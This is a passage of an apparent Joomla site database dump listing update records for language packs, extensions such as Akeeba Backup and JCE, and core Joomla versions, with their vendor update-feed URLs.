USA','','pkg_en-US','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(30623,57,0,'Estonian','','pkg_et-EE','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(30624,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(30625,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(30626,57,0,'German','','pkg_de-DE','package','',0,'3.9.9.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(30627,57,0,'German, Austria','','pkg_de-AT','package','',0,'3.9.9.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(30628,57,0,'German, Liechtenstein','','pkg_de-LI','package','',0,'3.9.9.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(30629,57,0,'German, Luxembourg','','pkg_de-LU','package','',0,'3.9.9.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(30630,57,0,'German, Switzerland','','pkg_de-CH','package','',0,'3.9.9.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(30631,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.7.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(30632,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(30633,57,0,'Latvian','','pkg_lv-LV','package','',0,'3.9.25.2','','https://update.joomla.org/language/details3/lv-LV_details.xml','',''),(30634,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(30635,57,0,'Norwegian Bokmål','','pkg_nb-NO','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/nb-NO_details.xml','',''),(30636,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(30637,57,0,'Portuguese, Brazil','','pkg_pt-BR','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(30638,57,0,'Portuguese, Portugal','','pkg_pt-PT','package','',0,'3.9.29.2','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(30639,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.10.1.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(30640,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(30641,57,0,'Spanish, Colombia','','pkg_es-CO','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(30642,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.9.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(30643,57,0,'Tamil, India','','pkg_ta-IN','package','',0,'3.9.9.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(30644,57,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(30645,122,0,'Google Structured Data Free','Google Structured Data Free','gsd','plugin','system',1,'5.0.1','','https://static.tassos.gr/update/gsdfree?type=.xml','\n			https://www.tassos.gr/releases/google-structured-data-markup/google-structured-data-markup-5-0-1			\n		',''),(30646,129,0,'JCE 2.9.16','Installation package for Joomla! 3.x and 4.x','pkg_jce','package','',0,'2.9.16','','https://cdn.joomlacontenteditor.net/updates/xml/editor/pkg_jce.xml','https://www.joomlacontenteditor.net/news/jce-pro-2-9-16-released',''),(30647,130,0,'T3 System Plugin','','t3','plugin','system',0,'3.0.6','','http://update.joomlart.com/service/tracking/j16/plg_system_t3.xml','http://www.joomlart.com/update-steps',''),(30648,135,0,' Phoca Gallery ',' Phoca Gallery is an efficient image gallery extension for Joomla! CMS. ','com_phocagallery','component','',1,'4.4.3','','https://raw.githubusercontent.com/PhocaCz/PhocaGallery/master/manifest.xml','http://www.phoca.cz/version/index.php?phocagallery=4.4.3',''),(30649,1,0,'Joomla','','joomla','file','',0,'3.10.2','','https://update.joomla.org/core/extension.xml','',''),(30650,1,0,'Joomla','','joomla','file','',0,'3.10.2','','https://update.joomla.org/core/extension.xml','',''),(30651,1,0,'Joomla','','joomla','file','',0,'3.10.2','','https://update.joomla.org/core/extension.xml','',''),(30652,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.11','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-11.html',''),(30653,1,0,'Joomla','','joomla','file','',0,'3.10.2','','https://update.joomla.org/core/extension.xml','',''),(30654,1,0,'Joomla','','joomla','file','',0,'3.10.2','','https://update.joomla.org/core/extension.xml','',''),(30655,1,0,'Joomla','','joomla','file','',0,'3.10.2','','https://update.joomla.org/core/extension.xml','',''),(30656,1,0,'Joomla','','joomla','file','',0,'3.10.2','','https://update.joomla.org/core/extension.xml','',''),(30657,1,0,'Joomla','','joomla','file','',0,'3.10.2','','https://update.joomla.org/core/extension.xml','',''),(30658,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.11','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-11.html',''),(30659,1,0,'Joomla','','joomla','file','',0,'3.10.2','','https://update.joomla.org/core/extension.xml','',''),(30660,1,0,'Joomla','','joomla','file','',0,'3.10.2','','https://update.joomla.org/core/extension.xml','',''),(30661,1,0,'Joomla','','joomla','file','',0,'3.10.2','','https://update.joomla.org/core/extension.xml','',''),(30662,1,0,'Joomla','','joomla','file','',0,'3.10.2','','https://update.joomla.org/core/extension.xml','',''),(30663,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.11','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-11.html',''),(30664,1,0,'Joomla','','joomla','file','',0,'3.10.2','','https://update.joomla.org/core/extension.xml','',''),(30665,1,0,'Joomla','','joomla','file','',0,'3.10.2','','https://update.joomla.org/core/extension.xml','',''),(30666,1,0,'Joomla','','joomla','file','',0,'3.10.2','','https://update.joomla.org/core/extension.xml','',''),(30667,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.11','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-11.html',''),(30668,1,0,'Joomla','','joomla','file','',0,'3.10.2','','https://update.joomla.org/core/extension.xml','',''),(30669,1,0,'Joomla','','joomla','file','',0,'3.10.2','','https://update.joomla.org/core/extension.xml','',''),(30670,1,0,'Joomla','','joomla','file','',0,'3.10.2','','https://update.joomla.org/core/extension.xml','',''),(30671,1,0,'Joomla','','joomla','file','',0,'3.10.2','','https://update.joomla.org/core/extension.xml','',''),(30672,1,0,'Joomla','','joomla','file','',0,'3.10.2','','https://update.joomla.org/core/extension.xml','',''),(30673,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.11','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-11.html',''),(30674,1,0,'Joomla','','joomla','file','',0,'3.10.2','','https://update.joomla.org/core/extension.xml','',''),(30675,1,0,'Joomla','','joomla','file','',0,'3.10.2','','https://update.joomla.org/core/extension.xml','',''),(30676,1,0,'Joomla','','joomla','file','',0,'3.10.2','','https://update.joomla.org/core/extension.xml','',''),(30677,1,0,'Joomla','','joomla','file','',0,'3.10.3','','https://update.joomla.org/core/extension.xml','',''),(30678,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.11','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-11.html',''),(30679,1,0,'Joomla','','joomla','file','',0,'3.10.3','','https://update.joomla.org/core/extension.xml','',''),(30680,1,0,'Joomla','','joomla','file','',0,'3.10.3','','https://update.joomla.org/core/extension.xml','',''),(30681,1,0,'Joomla','','joomla','file','',0,'3.10.3','','https://update.joomla.org/core/extension.xml','',''),(30682,1,0,'Joomla','','joomla','file','',0,'3.10.3','','https://update.joomla.org/core/extension.xml','',''),(30683,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.12','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-12.html',''),(30684,1,0,'Joomla','','joomla','file','',0,'3.10.3','','https://update.joomla.org/core/extension.xml','',''),(30685,1,0,'Joomla','','joomla','file','',0,'3.10.3','','https://update.joomla.org/core/extension.xml','',''),(30686,1,0,'Joomla','','joomla','file','',0,'3.10.3','','https://update.joomla.org/core/extension.xml','',''),(30687,1,0,'Joomla','','joomla','file','',0,'3.10.3','','https://update.joomla.org/core/extension.xml','',''),(30688,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.12','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-12.html',''),(30689,1,0,'Joomla','','joomla','file','',0,'3.10.3','','https://update.joomla.org/core/extension.xml','',''),(30690,1,0,'Joomla','','joomla','file','',0,'3.10.3','','https://update.joomla.org/core/extension.xml','',''),(30691,1,0,'Joomla','','joomla','file','',0,'3.10.3','','https://update.joomla.org/core/extension.xml','',''),(30692,1,0,'Joomla','','joomla','file','',0,'3.10.3','','https://update.joomla.org/core/extension.xml','',''),(30693,1,0,'Joomla','','joomla','file','',0,'3.10.3','','https://update.joomla.org/core/extension.xml','',''),(30694,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.12','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-12.html',''),(30695,1,0,'Joomla','','joomla','file','',0,'3.10.3','','https://update.joomla.org/core/extension.xml','',''),(30696,1,0,'Joomla','','joomla','file','',0,'3.10.3','','https://update.joomla.org/core/extension.xml','',''),(30697,1,0,'Joomla','','joomla','file','',0,'3.10.3','','https://update.joomla.org/core/extension.xml','',''),(30698,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.12','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-12.html',''),(30699,1,0,'Joomla','','joomla','file','',0,'3.10.3','','https://update.joomla.org/core/extension.xml','',''),(30700,1,0,'Joomla','','joomla','file','',0,'3.10.3','','https://update.joomla.org/core/extension.xml','',''),(30701,1,0,'Joomla','','joomla','file','',0,'3.10.3','','https://update.joomla.org/core/extension.xml','',''),(30702,1,0,'Joomla','','joomla','file','',0,'3.10.3','','https://update.joomla.org/core/extension.xml','',''),(30703,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.12','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-12.html',''),(30704,1,0,'Joomla','','joomla','file','',0,'3.10.3','','https://update.joomla.org/core/extension.xml','',''),(30705,1,0,'Joomla','','joomla','file','',0,'3.10.3','','https://update.joomla.org/core/extension.xml','',''),(30706,1,0,'Joomla','','joomla','file','',0,'3.10.3','','https://update.joomla.org/core/extension.xml','',''),(30707,1,0,'Joomla','','joomla','file','',0,'3.10.3','','https://update.joomla.org/core/extension.xml','',''),(30708,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.12','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-12.html',''),(30709,1,0,'Joomla','','joomla','file','',0,'3.10.3','','https://update.joomla.org/core/extension.xml','',''),(30710,1,0,'Joomla','','joomla','file','',0,'3.10.3','','https://update.joomla.org/core/extension.xml','',''),(30711,1,0,'Joomla','','joomla','file','',0,'3.10.3','','https://update.joomla.org/core/extension.xml','',''),(30712,1,0,'Joomla','','joomla','file','',0,'3.10.3','','https://update.joomla.org/core/extension.xml','',''),(30713,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.12','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-12.html',''),(30714,1,0,'Joomla','','joomla','file','',0,'3.10.3','','https://update.joomla.org/core/extension.xml','',''),(30715,1,0,'Joomla','','joomla','file','',0,'3.10.3','','https://update.joomla.org/core/extension.xml','',''),(30716,1,0,'Joomla','','joomla','file','',0,'3.10.3','','https://update.joomla.org/core/extension.xml','',''),(30717,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.12','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-12.html',''),(30718,1,0,'Joomla','','joomla','file','',0,'3.10.3','','https://update.joomla.org/core/extension.xml','',''),(30719,1,0,'Joomla','','joomla','file','',0,'3.10.3','','https://update.joomla.org/core/extension.xml','',''),(30720,1,0,'Joomla','','joomla','file','',0,'3.10.3','','https://update.joomla.org/core/extension.xml','',''),(30721,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.12','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-12.html',''),(30722,1,0,'Joomla','','joomla','file','',0,'3.10.3','','https://update.joomla.org/core/extension.xml','',''),(30723,1,0,'Joomla','','joomla','file','',0,'3.10.3','','https://update.joomla.org/core/extension.xml','',''),(30724,1,0,'Joomla','','joomla','file','',0,'3.10.3','','https://update.joomla.org/core/extension.xml','',''),(30725,1,0,'Joomla','','joomla','file','',0,'3.10.3','','https://update.joomla.org/core/extension.xml','',''),(30726,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.12','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-12.html',''),(30727,1,0,'Joomla','','joomla','file','',0,'3.10.3','','https://update.joomla.org/core/extension.xml','',''),(30728,1,0,'Joomla','','joomla','file','',0,'3.10.3','','https://update.joomla.org/core/extension.xml','',''),(30729,1,0,'Joomla','','joomla','file','',0,'3.10.3','','https://update.joomla.org/core/extension.xml','',''),(30730,1,0,'Joomla','','joomla','file','',0,'3.10.3','','https://update.joomla.org/core/extension.xml','',''),(30731,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.12','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-12.html',''),(30732,1,0,'Joomla','','joomla','file','',0,'3.10.3','','https://update.joomla.org/core/extension.xml','',''),(30733,1,0,'Joomla','','joomla','file','',0,'3.10.3','','https://update.joomla.org/core/extension.xml','',''),(30734,1,0,'Joomla','','joomla','file','',0,'3.10.3','','https://update.joomla.org/core/extension.xml','',''),(30735,1,0,'Joomla','','joomla','file','',0,'3.10.3','','https://update.joomla.org/core/extension.xml','',''),(30736,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.12','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-12.html',''),(30737,1,0,'Joomla','','joomla','file','',0,'3.10.3','','https://update.joomla.org/core/extension.xml','',''),(30738,1,0,'Joomla','','joomla','file','',0,'3.10.3','','https://update.joomla.org/core/extension.xml','',''),(30739,1,0,'Joomla','','joomla','file','',0,'3.10.3','','https://update.joomla.org/core/extension.xml','',''),(30740,1,0,'Joomla','','joomla','file','',0,'3.10.3','','https://update.joomla.org/core/extension.xml','',''),(30741,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.12','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-12.html',''),(30742,1,0,'Joomla','','joomla','file','',0,'3.10.3','','https://update.joomla.org/core/extension.xml','',''),(30743,1,0,'Joomla','','joomla','file','',0,'3.10.3','','https://update.joomla.org/core/extension.xml','',''),(30744,1,0,'Joomla','','joomla','file','',0,'3.10.3','','https://update.joomla.org/core/extension.xml','',''),(30745,1,0,'Joomla','','joomla','file','',0,'3.10.3','','https://update.joomla.org/core/extension.xml','',''),(30746,1,0,'Joomla','','joomla','file','',0,'3.10.3','','https://update.joomla.org/core/extension.xml','',''),(30747,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.12','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-12.html',''),(30748,1,0,'Joomla','','joomla','file','',0,'3.10.3','','https://update.joomla.org/core/extension.xml','',''),(30749,1,0,'Joomla','','joomla','file','',0,'3.10.3','','https://update.joomla.org/core/extension.xml','',''),(30750,1,0,'Joomla','','joomla','file','',0,'3.10.3','','https://update.joomla.org/core/extension.xml','',''),(30751,1,0,'Joomla','','joomla','file','',0,'3.10.3','','https://update.joomla.org/core/extension.xml','',''),(30752,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.12','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-12.html',''),(30753,1,0,'Joomla','','joomla','file','',0,'3.10.3','','https://update.joomla.org/core/extension.xml','',''),(30754,1,0,'Joomla','','joomla','file','',0,'3.10.3','','https://update.joomla.org/core/extension.xml','',''),(30755,1,0,'Joomla','','joomla','file','',0,'3.10.3','','https://update.joomla.org/core/extension.xml','',''),(30756,1,0,'Joomla','','joomla','file','',0,'3.10.3','','https://update.joomla.org/core/extension.xml','',''),(30757,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.12','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-12.html',''),(30758,1,0,'Joomla','','joomla','file','',0,'3.10.3','','https://update.joomla.org/core/extension.xml','',''),(30759,1,0,'Joomla','','joomla','file','',0,'3.10.3','','https://update.joomla.org/core/extension.xml','',''),(30760,1,0,'Joomla','','joomla','file','',0,'3.10.3','','https://update.joomla.org/core/extension.xml','',''),(30761,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.12','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-12.html',''),(30762,1,0,'Joomla','','joomla','file','',0,'3.10.3','','https://update.joomla.org/core/extension.xml','',''),(30763,1,0,'Joomla','','joomla','file','',0,'3.10.3','','https://update.joomla.org/core/extension.xml','',''),(30764,1,0,'Joomla','','joomla','file','',0,'3.10.3','','https://update.joomla.org/core/extension.xml','',''),(30765,1,0,'Joomla','','joomla','file','',0,'3.10.3','','https://update.joomla.org/core/extension.xml','',''),(30766,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.12','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-12.html',''),(30767,1,0,'Joomla','','joomla','file','',0,'3.10.3','','https://update.joomla.org/core/extension.xml','',''),(30768,1,0,'Joomla','','joomla','file','',0,'3.10.3','','https://update.joomla.org/core/extension.xml','',''),(30769,1,0,'Joomla','','joomla','file','',0,'3.10.3','','https://update.joomla.org/core/extension.xml','',''),(30770,1,0,'Joomla','','joomla','file','',0,'3.10.3','','https://update.joomla.org/core/extension.xml','',''),(30771,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.12','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-12.html',''),(30772,1,0,'Joomla','','joomla','file','',0,'3.10.3','','https://update.joomla.org/core/extension.xml','',''),(30773,1,0,'Joomla','','joomla','file','',0,'3.10.3','','https://update.joomla.org/core/extension.xml','',''),(30774,1,0,'Joomla','','joomla','file','',0,'3.10.3','','https://update.joomla.org/core/extension.xml','',''),(30775,1,0,'Joomla','','joomla','file','',0,'3.10.3','','https://update.joomla.org/core/extension.xml','',''),(30776,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.12','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-12.html',''),(30777,1,0,'Joomla','','joomla','file','',0,'3.10.3','','https://update.joomla.org/core/extension.xml','',''),(30778,1,0,'Joomla','','joomla','file','',0,'3.10.3','','https://update.joomla.org/core/extension.xml','',''),(30779,1,0,'Joomla','','joomla','file','',0,'3.10.3','','https://update.joomla.org/core/extension.xml','',''),(30780,1,0,'Joomla','','joomla','file','',0,'3.10.3','','https://update.joomla.org/core/extension.xml','',''),(30781,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.13','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-13.html',''),(30782,1,0,'Joomla','','joomla','file','',0,'3.10.3','','https://update.joomla.org/core/extension.xml','',''),(30783,1,0,'Joomla','','joomla','file','',0,'3.10.3','','https://update.joomla.org/core/extension.xml','',''),(30784,1,0,'Joomla','','joomla','file','',0,'3.10.3','','https://update.joomla.org/core/extension.xml','',''),(30785,1,0,'Joomla','','joomla','file','',0,'3.10.3','','https://update.joomla.org/core/extension.xml','',''),(30786,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.13','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-13.html',''),(30787,1,0,'Joomla','','joomla','file','',0,'3.10.3','','https://update.joomla.org/core/extension.xml','',''),(30788,1,0,'Joomla','','joomla','file','',0,'3.10.3','','https://update.joomla.org/core/extension.xml','',''),(30789,1,0,'Joomla','','joomla','file','',0,'3.10.3','','https://update.joomla.org/core/extension.xml','',''),(30790,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.13','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-13.html',''),(30791,1,0,'Joomla','','joomla','file','',0,'3.10.3','','https://update.joomla.org/core/extension.xml','',''),(30792,1,0,'Joomla','','joomla','file','',0,'3.10.3','','https://update.joomla.org/core/extension.xml','',''),(30793,1,0,'Joomla','','joomla','file','',0,'3.10.3','','https://update.joomla.org/core/extension.xml','',''),(30794,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.13','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-13.html',''),(30795,1,0,'Joomla','','joomla','file','',0,'3.10.3','','https://update.joomla.org/core/extension.xml','',''),(30796,1,0,'Joomla','','joomla','file','',0,'3.10.3','','https://update.joomla.org/core/extension.xml','',''),(30797,1,0,'Joomla','','joomla','file','',0,'3.10.3','','https://update.joomla.org/core/extension.xml','',''),(30798,1,0,'Joomla','','joomla','file','',0,'3.10.3','','https://update.joomla.org/core/extension.xml','',''),(30799,1,0,'Joomla','','joomla','file','',0,'3.10.3','','https://update.joomla.org/core/extension.xml','',''),(30800,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.13','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-13.html',''),(30801,1,0,'Joomla','','joomla','file','',0,'3.10.3','','https://update.joomla.org/core/extension.xml','',''),(30802,1,0,'Joomla','','joomla','file','',0,'3.10.3','','https://update.joomla.org/core/extension.xml','',''),(30803,1,0,'Joomla','','joomla','file','',0,'3.10.3','','https://update.joomla.org/core/extension.xml','',''),(30804,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.13','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-13.html',''),(30805,1,0,'Joomla','','joomla','file','',0,'3.10.3','','https://update.joomla.org/core/extension.xml','',''),(30806,1,0,'Joomla','','joomla','file','',0,'3.10.3','','https://update.joomla.org/core/extension.xml','',''),(30807,1,0,'Joomla','','joomla','file','',0,'3.10.3','','https://update.joomla.org/core/extension.xml','',''),(30808,1,0,'Joomla','','joomla','file','',0,'3.10.3','','https://update.joomla.org/core/extension.xml','',''),(30809,1,0,'Joomla','','joomla','file','',0,'3.10.3','','https://update.joomla.org/core/extension.xml','',''),(30810,1,0,'Joomla','','joomla','file','',0,'3.10.3','','https://update.joomla.org/core/extension.xml','',''),(30811,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.13','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-13.html',''),(30812,1,0,'Joomla','','joomla','file','',0,'3.10.3','','https://update.joomla.org/core/extension.xml','',''),(30813,1,0,'Joomla','','joomla','file','',0,'3.10.3','','https://update.joomla.org/core/extension.xml','',''),(30814,1,0,'Joomla','','joomla','file','',0,'3.10.3','','https://update.joomla.org/core/extension.xml','',''),(30815,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.13','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-13.html',''),(30816,1,0,'Joomla','','joomla','file','',0,'3.10.3','','https://update.joomla.org/core/extension.xml','',''),(30817,1,0,'Joomla','','joomla','file','',0,'3.10.3','','https://update.joomla.org/core/extension.xml','',''),(30818,1,0,'Joomla','','joomla','file','',0,'3.10.3','','https://update.joomla.org/core/extension.xml','',''),(30819,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.13','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-13.html',''),(30820,1,0,'Joomla','','joomla','file','',0,'3.10.3','','https://update.joomla.org/core/extension.xml','',''),(30821,1,0,'Joomla','','joomla','file','',0,'3.10.3','','https://update.joomla.org/core/extension.xml','',''),(30822,1,0,'Joomla','','joomla','file','',0,'3.10.3','','https://update.joomla.org/core/extension.xml','',''),(30823,1,0,'Joomla','','joomla','file','',0,'3.10.3','','https://update.joomla.org/core/extension.xml','',''),(30824,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.13','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-13.html',''),(30825,1,0,'Joomla','','joomla','file','',0,'3.10.3','','https://update.joomla.org/core/extension.xml','',''),(30826,1,0,'Joomla','','joomla','file','',0,'3.10.3','','https://update.joomla.org/core/extension.xml','',''),(30827,1,0,'Joomla','','joomla','file','',0,'3.10.3','','https://update.joomla.org/core/extension.xml','',''),(30828,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.13','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-13.html',''),(30829,1,0,'Joomla','','joomla','file','',0,'3.10.3','','https://update.joomla.org/core/extension.xml','',''),(30830,1,0,'Joomla','','joomla','file','',0,'3.10.3','','https://update.joomla.org/core/extension.xml','',''),(30831,1,0,'Joomla','','joomla','file','',0,'3.10.3','','https://update.joomla.org/core/extension.xml','',''),(30832,1,0,'Joomla','','joomla','file','',0,'3.10.3','','https://update.joomla.org/core/extension.xml','',''),(30833,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.13','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-13.html',''),(30834,1,0,'Joomla','','joomla','file','',0,'3.10.3','','https://update.joomla.org/core/extension.xml','',''),(30835,1,0,'Joomla','','joomla','file','',0,'3.10.3','','https://update.joomla.org/core/extension.xml','',''),(30836,1,0,'Joomla','','joomla','file','',0,'3.10.3','','https://update.joomla.org/core/extension.xml','',''),(30837,1,0,'Joomla','','joomla','file','',0,'3.10.3','','https://update.joomla.org/core/extension.xml','',''),(30838,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.13','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-13.html',''),(30839,1,0,'Joomla','','joomla','file','',0,'3.10.3','','https://update.joomla.org/core/extension.xml','',''),(30840,1,0,'Joomla','','joomla','file','',0,'3.10.3','','https://update.joomla.org/core/extension.xml','',''),(30841,1,0,'Joomla','','joomla','file','',0,'3.10.3','','https://update.joomla.org/core/extension.xml','',''),(30842,1,0,'Joomla','','joomla','file','',0,'3.10.3','','https://update.joomla.org/core/extension.xml','',''),(30843,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.13','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-13.html',''),(30844,1,0,'Joomla','','joomla','file','',0,'3.10.3','','https://update.joomla.org/core/extension.xml','',''),(30845,1,0,'Joomla','','joomla','file','',0,'3.10.3','','https://update.joomla.org/core/extension.xml','',''),(30846,1,0,'Joomla','','joomla','file','',0,'3.10.3','','https://update.joomla.org/core/extension.xml','',''),(30847,1,0,'Joomla','','joomla','file','',0,'3.10.3','','https://update.joomla.org/core/extension.xml','',''),(30848,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.13','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-13.html',''),(30849,1,0,'Joomla','','joomla','file','',0,'3.10.3','','https://update.joomla.org/core/extension.xml','',''),(30850,1,0,'Joomla','','joomla','file','',0,'3.10.3','','https://update.joomla.org/core/extension.xml','',''),(30851,1,0,'Joomla','','joomla','file','',0,'3.10.3','','https://update.joomla.org/core/extension.xml','',''),(30852,67,0,'Akeeba Backup Core 